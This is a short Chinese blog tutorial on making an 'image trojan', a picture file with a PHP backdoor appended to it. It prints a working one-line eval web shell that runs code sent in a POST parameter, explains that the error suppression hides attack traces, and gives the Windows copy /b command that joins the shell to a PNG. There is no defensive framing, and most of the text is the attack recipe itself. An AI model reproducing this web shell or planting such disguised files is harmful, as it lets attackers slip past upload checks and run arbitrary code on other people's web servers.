相信爱看博主文章的各位彦祖和亦非们都看过博主在文章中提到图片马
那到底什么是图片马呢?
简单来说就是图片与木马合成的二进制文件
怎么合成呢?
这里博主就直接进入正题了
首先我们要新建一个文件夹
然后把图片和木马都放进去这个文件夹里面
这里博主的木马是这样写的
<?php @eval($_POST['cmd']);?>
这个的意思是
<?php ... ?>:PHP代码标记,表示中间内容是PHP脚本。@:错误抑制符,让即使后续函数出错也不显示报错,目的是隐藏攻击痕迹。eval($_POST['cmd']):$_POST['cmd']:接收HTTP POST请求中参数名为cmd的值。eval():把传入的字符串当作PHP代码执行
图片的内容则是保持原有的不变
最后启动cmd,执行下述命令
copy /b C:\Users\11548\Desktop\新建文件夹\1.png + C:\Users\11548\Desktop\新建文件夹\2.php C:\Users\11548\Desktop\新建文件夹\3.png
这里的意思就是复制,用二进制的形式,这里博主使用的是绝对路径
第一个是图片的绝对路径
第二个是木马的绝对路径
第三个是生成图片马的绝对路径
中间的+号,前后都有空格
这里的图片马就是把图片和木马的代码合并放一起了
到这里我们就会生成图片马在文件夹中
文章到此结束
有不懂的欢迎评论区留言
博主看到会及时回复
感谢您宝贵的时间
)
